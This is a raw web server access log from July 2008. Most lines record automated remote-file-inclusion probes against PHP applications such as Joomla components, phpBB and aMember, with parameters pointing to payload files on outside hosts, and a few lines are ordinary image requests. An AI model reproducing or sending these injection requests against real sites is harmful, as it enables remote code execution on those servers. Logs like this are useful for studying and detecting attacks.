78.157.129.6 - - [19/Jul/2008:09:31:31 -0700] "GET /logs/access_080315.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:31:32 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:31:34 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.247.226.253 - - [19/Jul/2008:09:31:36 -0700] "GET /logs/access_080329.log//ktmlpro/includes/ktedit/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
211.247.226.253 - - [19/Jul/2008:09:31:36 -0700] "GET /logs//ktmlpro/includes/ktedit/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
211.247.226.253 - - [19/Jul/2008:09:31:36 -0700] "GET //ktmlpro/includes/ktedit/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
77.92.74.1 - - [19/Jul/2008:09:31:39 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.azurestar.com.tw/appserv/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.92.74.1 - - [19/Jul/2008:09:31:41 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.azurestar.com.tw/appserv/safeon.txt? HTTP/1.1" 200 18625 "-" "libwww-perl/5.810" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:09:31:46 -0700] "GET /logs/index.php?go=http://www.blackstock.ca/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:09:31:47 -0700] "GET /index.php?go=http://www.blackstock.ca/alb?? HTTP/1.1" 200 18375 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:09:31:49 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:09:31:49 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.5.163.212 - - [19/Jul/2008:09:32:41 -0700] "GET /logs//errors.php?_CONF[path_system]=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.5.163.212 - - [19/Jul/2008:09:32:41 -0700] "GET //errors.php?_CONF[path_system]=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:09:32:47 -0700] "GET /?mosConfig_absolute_path=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 200 18429 "-" "libwww-perl/5.79" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:33:09 -0700] "GET /logs/access_080322.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:33:14 -0700] "GET /logs/access_080329.log//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:33:28 -0700] "GET /logs/access_080212.log//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:33:28 -0700] "GET //errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:33:29 -0700] "GET /logs//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:33:32 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 200 18381 "-" "libwww-perl/5.79" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:33:35 -0700] "GET /logs/access_080225.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [19/Jul/2008:09:33:49 -0700] "GET /logs/access_080329.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [19/Jul/2008:09:33:49 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [19/Jul/2008:09:33:50 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:34:26 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:34:27 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:34:28 -0700] "GET /logs/access_080207.log//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.235.101 - - [19/Jul/2008:09:34:53 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.221.130.15 - - [19/Jul/2008:09:34:54 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.98.167 - - [19/Jul/2008:09:34:54 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.98.167 - - [19/Jul/2008:09:34:56 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18499 "-" "libwww-perl/5.812" "www.dmulk.com"
205.234.235.101 - - [19/Jul/2008:09:34:56 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18499 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.98.167 - - [19/Jul/2008:09:34:56 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.234.235.101 - - [19/Jul/2008:09:34:56 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:09:35:02 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:09:35:03 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.5.163.212 - - [19/Jul/2008:09:35:18 -0700] "GET //errors.php?DOCUMENT_ROOT=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.5.163.212 - - [19/Jul/2008:09:35:18 -0700] "GET /logs//errors.php?DOCUMENT_ROOT=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
151.190.254.108 - - [19/Jul/2008:09:35:21 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/index.php?showtopic=36984" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727)" "dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:35:50 -0700] "GET /logs/access_080329.log//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:35:50 -0700] "GET //errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:35:51 -0700] "GET /logs//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:09:35:52 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:09:35:55 -0700] "GET /logs/access_080513.log/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:09:36:24 -0700] "GET /?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 200 18413 "-" "libwww-perl/5.803" "www.dmulk.com"
194.85.80.86 - - [19/Jul/2008:09:36:40 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
194.85.80.86 - - [19/Jul/2008:09:36:40 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:36:49 -0700] "GET /logs/access_080331.log//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:36:49 -0700] "GET //errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:36:50 -0700] "GET /logs//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:36:57 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sunshineruby.com/gbook/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:37:07 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:37:07 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:37:18 -0700] "GET /logs/access_080325.log//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:37:36 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sunshineruby.com/gbook/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:37:36 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sunshineruby.com/gbook/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:37:44 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:38:16 -0700] "GET /logs/access_080207.log//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:38:23 -0700] "GET /logs/access_071225.log//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:39:09 -0700] "GET /logs/access_080315.log//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:39:09 -0700] "GET //errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:39:09 -0700] "GET /logs//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:39:10 -0700] "GET /logs/access_080128.log/index.php?sub=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:39:12 -0700] "GET /index.php?sub=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 18437 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:39:13 -0700] "GET /logs/index.php?sub=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:09:39:16 -0700] "GET /?mosConfig_absolute_path=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 200 18429 "-" "libwww-perl/5.79" "www.dmulk.com"
74.220.199.23 - - [19/Jul/2008:09:39:18 -0700] "GET //errors.php?error=http://www.pne.de//contenido/includes/cmd.gif?%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
74.220.199.23 - - [19/Jul/2008:09:39:18 -0700] "GET /logs//errors.php?error=http://www.pne.de//contenido/includes/cmd.gif?%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
83.148.101.224 - - [19/Jul/2008:09:39:35 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.148.101.224 - - [19/Jul/2008:09:39:35 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:39:46 -0700] "GET /logs/access_080322.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.233.78 - - [19/Jul/2008:09:40:10 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 200 18397 "-" "libwww-perl/5.810" "www.dmulk.com"
204.11.233.78 - - [19/Jul/2008:09:40:11 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 200 18413 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.15 - - [19/Jul/2008:09:41:38 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [19/Jul/2008:09:41:39 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.221.154.111 - - [19/Jul/2008:09:41:49 -0700] "GET /logs/access_080207.log//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.17.200.206 - - [19/Jul/2008:09:41:58 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.206 - - [19/Jul/2008:09:41:58 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.206 - - [19/Jul/2008:09:41:59 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 200 18463 "-" "libwww-perl/5.79" "www.dmulk.com"
89.188.104.4 - - [19/Jul/2008:09:42:12 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 200 18413 "-" "libwww-perl/5.810" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:42:15 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:42:15 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:42:16 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.1.169 - - [19/Jul/2008:09:42:33 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 200 18431 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.140.162 - - [19/Jul/2008:09:42:44 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.elektroanlagen-sperling.de/i.txt?? HTTP/1.1" 200 18429 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:09:42:56 -0700] "GET /logs/access_080225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:09:42:56 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:09:42:56 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.148.101.224 - - [19/Jul/2008:09:43:19 -0700] "GET /logs/access_080329.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.55.231.68 - - [19/Jul/2008:09:43:27 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.231.68 - - [19/Jul/2008:09:43:28 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0123.jpg HTTP/1.1" 200 552331 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
212.143.233.40 - - [19/Jul/2008:09:43:39 -0700] "GET //popup_window.php?site_isp_root=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:09:44:00 -0700] "GET /?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 200 18413 "-" "libwww-perl/5.803" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:09:44:06 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:09:44:09 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 200 18515 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:09:44:09 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.23.156.220 - - [19/Jul/2008:09:44:13 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [19/Jul/2008:09:44:16 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:09:44:50 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:09:44:52 -0700] "GET //index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 18453 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
92.51.130.220 - - [19/Jul/2008:09:45:01 -0700] "GET //trans/trans.php?trans=eng&page=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:09:45:05 -0700] "GET /logs//Forums/admin/admin_users.php?phpbb_root_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:09:45:05 -0700] "GET //Forums/admin/admin_users.php?phpbb_root_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:46:09 -0700] "GET /logs/access_080128.log/index.php?sub=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:09:46:10 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:46:11 -0700] "GET /index.php?sub=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 18437 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:46:13 -0700] "GET /logs/index.php?sub=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:09:46:13 -0700] "GET //index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 18453 "-" "libwww-perl/5.805" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:09:46:14 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:09:46:22 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:09:46:23 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 200 18517 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
